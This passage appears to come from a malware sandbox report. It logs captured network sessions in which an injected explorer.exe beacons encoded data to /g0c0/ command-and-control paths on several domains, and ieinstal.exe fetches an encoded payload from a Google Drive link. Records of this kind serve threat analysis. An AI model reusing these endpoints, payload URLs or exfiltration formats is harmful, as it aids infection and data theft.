Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.6	49734	52.20.84.62	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2023 17:20:30.765657902 CET	1031	OUT	GET /g0c0/?J1ZahCdL=4D8KR/+l2rJ4yEknA3NwL/xew2D800GqbWuv46luKoyREYUfmcWzY8S0FaFCA4RxGPUwgCES1+CGDKu8j/pMqbkqVClt2I2j7UamBTzpVw1B&uEk=kKVhb1ODb HTTP/1.1 Host: www.nichevesting.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 2, 2023 17:20:30.920242071 CET	1031	IN	HTTP/1.1 404 Not Found Server: openresty Date: Thu, 02 Mar 2023 16:20:30 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 96<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.6	49735	172.96.191.163	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2023 17:20:42.613642931 CET	1033	OUT	POST /g0c0/ HTTP/1.1 Host: www.bebas88official.click Connection: close Content-Length: 194 Cache-Control: no-cache Origin: http://www.bebas88official.click User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.bebas88official.click/g0c0/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4a 31 5a 61 68 43 64 4c 3d 32 43 41 41 69 6c 6d 52 68 31 66 66 41 2d 59 65 30 67 73 65 7e 4c 6f 58 4d 4a 71 7a 76 65 59 6c 44 38 45 70 6d 73 6d 57 58 45 52 5a 72 62 49 4a 4d 72 4b 39 35 46 6f 56 50 78 6f 69 6f 77 30 72 77 6a 6c 2d 4b 7a 47 61 57 36 56 57 64 4d 55 4a 7a 6b 35 37 61 64 33 6d 67 4b 47 6e 63 66 6c 7a 4f 48 65 37 62 63 73 56 76 46 78 71 34 33 57 47 39 36 58 54 52 38 30 6d 48 48 77 61 51 4d 68 65 7a 41 49 6a 76 34 52 75 4e 6c 56 6f 36 33 76 31 77 38 39 65 68 50 63 59 57 4c 30 46 4b 77 4a 4e 6d 75 56 46 4c 6c 4f 58 5a 33 41 72 66 4e 35 66 39 77 53 6f 50 43 67 2e 00 00 00 00 00 00 00 00 Data Ascii: J1ZahCdL=2CAAilmRh1ffA-Ye0gse~LoXMJqzveYlD8EpmsmWXERZrbIJMrK95FoVPxoiow0rwjl-KzGaW6VWdMUJzk57ad3mgKGncflzOHe7bcsVvFxq43WG96XTR80mHHwaQMhezAIjv4RuNlVo63v1w89ehPcYWL0FKwJNmuVFLlOXZ3ArfN5f9wSoPCg.
Mar 2, 2023 17:20:42.781308889 CET	1034	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Thu, 02 Mar 2023 16:20:42 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.6	49736	172.96.191.163	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2023 17:20:45.289100885 CET	1036	OUT	POST /g0c0/ HTTP/1.1 Host: www.bebas88official.click Connection: close Content-Length: 1458 Cache-Control: no-cache Origin: http://www.bebas88official.click User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.bebas88official.click/g0c0/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4a 31 5a 61 68 43 64 4c 3d 32 43 41 41 69 6c 6d 52 68 31 66 66 52 76 6f 65 78 44 30 65 35 72 6f 55 4a 4a 71 7a 6c 2d 59 68 44 39 34 70 6d 75 4b 67 58 33 39 5a 71 49 77 4a 4e 4f 57 39 37 46 6f 56 65 52 6f 6d 6e 51 30 48 77 6a 5a 49 4b 78 65 4b 57 34 35 57 63 76 38 4a 78 6d 52 36 50 39 33 6b 7a 61 47 6d 63 66 6b 70 4f 48 50 79 62 63 70 64 76 45 5a 71 6b 56 75 47 35 36 58 55 55 38 30 6d 48 48 77 65 51 4d 67 39 7a 41 42 32 76 35 35 2d 4f 57 4e 6f 39 58 50 31 32 66 6c 52 77 5f 63 63 66 72 31 45 45 43 63 5f 6a 73 4d 71 4d 57 71 6f 4f 58 30 31 66 65 4d 58 70 44 36 58 62 6d 7e 32 65 4d 33 79 71 71 65 72 48 6c 75 5f 51 4c 39 4d 28 32 53 73 68 73 4a 73 41 68 50 45 64 46 49 6b 6a 6e 48 4e 48 32 37 73 71 70 4f 39 61 69 32 62 6f 5f 48 65 36 61 69 34 67 4e 50 62 4c 59 66 32 4d 6c 38 70 58 45 6b 77 49 4a 7a 33 33 37 42 43 46 61 64 68 69 2d 72 6c 47 44 44 47 5a 30 28 4b 64 48 55 50 4a 32 35 70 72 36 66 4f 58 65 44 43 72 53 68 69 4a 51 69 54 37 76 76 78 32 37 65 5f 74 5f 4d 4f 75 56 48 70 39 31 36 54 32 39 64 71 57 67 4b 63 78 59 33 64 6e 62 54 75 49 31 43 5a 41 53 7e 64 78 55 51 4f 63 4b 51 43 4c 56 28 65 66 5f 59 47 79 75 51 62 41 7a 51 4a 50 61 48 62 49 47 30 77 4c 44 39 61 46 35 6d 53 43 6b 74 50 7e 53 50 5a 67 55 34 47 57 5f 43 6c 32 56 6b 51 44 59 54 4a 37 4d 68 4e 4f 38 7e 6b 6f 78 42 73 79 63 47 35 66 70 73 46 28 37 35 6c 75 62 6a 77 72 47 52 46 34 63 6b 2d 62 71 35 30 43 62 49 63 76 59 76 78 79 42 41 66 74 4a 48 4b 30 77 69 38 77 30 49 7a 39 59 79 44 51 34 53 77 53 45 6b 61 4b 73 6b 46 75 54 73 72 50 68 71 7a 64 78 67 6d 52 43 35 58 54 63 51 6c 6f 5f 69 58 52 43 69 34 71 7a 6a 62 57 56 50 61 4d 6c 4e 78 4e 74 4d 42 58 56 71 71 32 42 5a 4e 4c 48 67 4e 4a 49 51 44 42 42 33 4c 7e 73 56 5f 7a 7a 6b 62 39 64 78 4f 64 47 63 47 57 39 32 41 46 64 76 45 70 58 59 66 6f 75 6b 76 44 4c 68 30 33 67 50 6a 73 76 4c 78 66 4f 4d 75 52 47 46 72 73 36 72 52 35 52 5a 44 75 77 50 46 34 33 66 59 55 37 47 31 42 4c 43 37 5a 4c 65 6d 33 53 7e 53 6f 49 43 47 39 64 47 54 43 74 6f 72 65 42 76 7a 73 47 50 70 34 4e 68 72 4f 32 33 4e 41 72 38 71 70 33 78 50 78 35 34 35 58 2d 37 32 28 70 45 41 6e 49 6a 72 6a 4e 46 32 6f 35 37 49 6e 4d 72 45 6b 48 45 51 4b 68 56 59 69 4e 39 57 6c 31 73 2d 4f 44 6a 36 4d 4f 78 5a 54 32 61 43 4b 4e 4d 63 77 53 58 35 4c 36 67 69 79 31 59 77 75 61 6d 6d 41 6a 45 33 56 72 70 38 42 63 76 4e 68 39 58 73 63 45 42 69 4d 48 61 63 70 4b 38 54 43 77 4c 42 57 41 4b 6d 52 36 44 62 52 49 50 70 76 46 44 62 6d 48 6b 52 41 33 56 78 70 73 4a 77 47 7a 64 74 4e 2d 62 31 45 4f 7e 78 4e 64 4d 49 47 62 52 39 73 58 38 74 7e 6b 34 38 39 33 4c 49 6b 56 76 7a 46 6f 53 49 6b 37 61 53 67 30 33 74 32 37 76 63 4f 43 39 56 45 50 5a 4c 77 6e 44 71 39 43 45 77 7a 30 59 4f 35 65 44 63 52 63 58 61 48 77 35 47 75 68 77 35 77 5f 4c 48 55 4a 41 56 74 57 47 54 4e 61 31 75 65 53 79 66 56 57 77 65 50 57 35 30 28 47 51 55 30 6a 4b 71 4e 6d 76 6a 65 36 6a 42 69 56 65 68 71 6d 51 61 77 7a 42 4c 43 6b 64 7a 43 42 4d 4d 4c 64 64 45 71 47 6c 6f 71 49 38 47 45 46 53 4f 35 57 31 39 62 51 46 4e 63 36 62 58 62 4a 56 48 38 57 46 48 64 5a 37 4e 46 5a 5a 32 37 6c 46 45 4c 64 76 38 69 70 56 39 65 4f 77 58 63 55 6b 38 32 37 7a 5f 73 64 44 65 4f 56 65 68 57 37 52 5a 48 4c 39 44 54 4d 59 76 52 49 4b 75 36 6d 7a 4b 33 62 54 42 41 55 46 58 37 6f 30 47 4d 50 46 43 77 58 44 63 7a 70 57 48 49 46 42 68 5a 41 43 2d 49 53 56 71 45 37 59 56 43 31 4c 75 7a 55 75 32 38 56 71 71 58 4c 4e 6d 62 4f 33 4d 30 47 4e 76 52 4d 68 4d 70 78 66 6e 44 48 6c 58 75 71 77 67 49 78 6e 43 48 55 4a 57 75 68 66 37 65 63 70 52 7a 57 55 6b 4f 63 49 44 65 6e 4a 55 58 47 58 63 33 4b 62 66 71 4d 69 4f 55 57 53 6d 57 4e 28 33 4b 71 47 75 7e 76 33 37 74 78 32 51 28 42 77 33 39 66 41 56 7a 75 64 69 38 61 42 6e 49 34 53 37 76 6b 50 37 7e 69 65 41 61 37 4b 33 75 5a 39 77 48 34 73 47 48 4d 45 58 72 4b 6e 32 58 6c 46 44 6f 56 6f 6e 45 39 57 57 64 71 76 73 39 34 57 5a 47 38 35 4e 39 67 30 4e 68 74 32 50 50 51 56 4f 77 35 62 4b 4b 47 34 45 67 72 28 58 31 68 41 5f 38 77 57 44 77 4e 64 59 36 65 77 62 52 6a 46 4c 42 36 79 76 63 67 43 67 64 70 4d 75 4b 62 6c 64 47 41 35 4b 71 74 7a 57 47 53 4d 71 45 41 59 4f 69 6e 43 79 4d 44 Data Ascii: J1ZahCdL=2CAAilmRh1ffRvoexD0e5roUJJqzl-YhD94pmuKgX39ZqIwJNOW97FoVeRomnQ0HwjZIKxeKW45Wcv8JxmR6P93kzaGmcfkpOHPybcpdvEZqkVuG56XUU80mHHweQMg9zAB2v55-OWNo9XP12flRw_ccfr1EECc_jsMqMWqoOX01feMXpD6Xbm~2eM3yqqerHlu_QL9M(2SshsJsAhPEdFIkjnHNH27sqpO9ai2bo_He6ai4gNPbLYf2Ml8pXEkwIJz337BCFadhi-rlGDDGZ0(KdHUPJ25pr6fOXeDCrShiJQiT7vvx27e_t_MOuVHp916T29dqWgKcxY3dnbTuI1CZAS~dxUQOcKQCLV(ef_YGyuQbAzQJPaHbIG0wLD9aF5mSCktP~SPZgU4GW_Cl2VkQDYTJ7MhNO8~koxBsycG5fpsF(75lubjwrGRF4ck-bq50CbIcvYvxyBAftJHK0wi8w0Iz9YyDQ4SwSEkaKskFuTsrPhqzdxgmRC5XTcQlo_iXRCi4qzjbWVPaMlNxNtMBXVqq2BZNLHgNJIQDBB3L~sV_zzkb9dxOdGcGW92AFdvEpXYfoukvDLh03gPjsvLxfOMuRGFrs6rR5RZDuwPF43fYU7G1BLC7ZLem3S~SoICG9dGTCtoreBvzsGPp4NhrO23NAr8qp3xPx545X-72(pEAnIjrjNF2o57InMrEkHEQKhVYiN9Wl1s-ODj6MOxZT2aCKNMcwSX5L6giy1YwuammAjE3Vrp8BcvNh9XscEBiMHacpK8TCwLBWAKmR6DbRIPpvFDbmHkRA3VxpsJwGzdtN-b1EO~xNdMIGbR9sX8t~k4893LIkVvzFoSIk7aSg03t27vcOC9VEPZLwnDq9CEwz0YO5eDcRcXaHw5Guhw5w_LHUJAVtWGTNa1ueSyfVWwePW50(GQU0jKqNmvje6jBiVehqmQawzBLCkdzCBMMLddEqGloqI8GEFSO5W19bQFNc6bXbJVH8WFHdZ7NFZZ27lFELdv8ipV9eOwXcUk827z_sdDeOVehW7RZHL9DTMYvRIKu6mzK3bTBAUFX7o0GMPFCwXDczpWHIFBhZAC-ISVqE7YVC1LuzUu28VqqXLNmbO3M0GNvRMhMpxfnDHlXuqwgIxnCHUJWuhf7ecpRzWUkOcIDenJUXGXc3KbfqMiOUWSmWN(3KqGu~v37tx2Q(Bw39fAVzudi8aBnI4S7vkP7~ieAa7K3uZ9wH4sGHMEXrKn2XlFDoVonE9WWdqvs94WZG85N9g0Nht2PPQVOw5bKKG4Egr(X1hA_8wWDwNdY6ewbRjFLB6yvcgCgdpMuKbldGA5KqtzWGSMqEAYOinCyMDx4KcK101i2vMjSBz1J3NOd35dTfpxbW4uZyncKe70ViNSIux6nxsVLQ3gQRNjWAudR6PSCaFltE11EQ8P1Hu1x8tn3sZA.
Mar 2, 2023 17:20:45.450390100 CET	1037	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Thu, 02 Mar 2023 16:20:45 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49712	142.250.203.110	443	C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-02 16:18:24 UTC	0	OUT	GET /uc?export=download&id=1IuicZ_8vQE9dU4bfx34MrSLFAhHaLs1l HTTP/1.1 Host: drive.google.com Connection: Keep-Alive
2023-03-02 16:18:24 UTC	0	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 02 Mar 2023 16:18:24 GMT Location: https://doc-14-7s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/qspainn16n64l8j7o5p977ji1aeg2b86/1677773850000/00214763071378112578//1IuicZ_8vQE9dU4bfx34MrSLFAhHaLs1l?e=download&uuid=cb10c202-86bb-4a69-9700-bc9cbb433bf0 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'report-sample' 'nonce-gUkNShF-hGm2y80f3GY1XA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49714	172.217.168.65	443	C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-02 16:18:25 UTC	1	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/qspainn16n64l8j7o5p977ji1aeg2b86/1677773850000/00214763071378112578/*/1IuicZ_8vQE9dU4bfx34MrSLFAhHaLs1l?e=download&uuid=cb10c202-86bb-4a69-9700-bc9cbb433bf0 HTTP/1.1 Host: doc-14-7s-docs.googleusercontent.com Connection: Keep-Alive
2023-03-02 16:18:25 UTC	1	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycdsXY4aQv0OYNTIpevilCouoszd7ygUWepdbH2xS_vKX7g3JuCxoqXFCoOWRDkpxzr-9IZjz2RYXaZBmQ5usdtjjeHivGtwI Content-Type: application/octet-stream Content-Disposition: attachment; filename="Restadopg.snp"; filename=UTF-8''Restadopg.snp Access-Control-Allow-Origin: Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-user-App-ID-Token, X-Earth-user-Computation-Profile, X-Earth-user-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token Access-Control-Allow-Methods: GET,HEAD,OPTIONS Content-Length: 249224 Date: Thu, 02 Mar 2023 16:18:25 GMT Expires: Thu, 02 Mar 2023 16:18:25 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=zEjkLA== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2023-03-02 16:18:25 UTC	5	IN	Data Raw: 63 51 47 62 63 51 47 62 75 31 68 57 44 77 44 72 41 6d 47 53 63 51 47 62 41 31 77 6b 42 4f 73 43 44 7a 56 78 41 5a 75 35 4d 6c 6f 53 41 4f 73 43 78 73 33 72 41 75 36 7a 67 65 6d 52 75 72 7a 4b 36 77 4c 6f 63 58 45 42 6d 34 48 42 58 32 43 71 79 75 73 43 6a 6e 39 78 41 5a 76 72 41 6f 63 50 36 77 4b 76 4e 62 6f 43 41 34 67 48 63 51 47 62 63 51 47 62 36 77 4a 63 2f 33 45 42 6d 7a 48 4b 36 77 4a 54 72 75 73 43 76 78 53 4a 46 41 76 72 41 6b 62 77 36 77 4a 48 75 74 48 69 36 77 4c 78 61 6e 45 42 6d 34 50 42 42 48 45 42 6d 2b 73 43 66 44 53 42 2b 57 6a 4d 63 67 4e 38 79 58 45 42 6d 33 45 42 6d 34 74 45 4a 41 52 78 41 5a 74 78 41 5a 75 4a 77 2b 73 43 6e 53 37 72 41 76 4f 4a 67 63 4d 68 70 6a 30 43 36 77 4a 51 72 58 45 42 6d 37 6f 30 39 79 39 4b 63 51 47 62 63 51 47 Data Ascii: 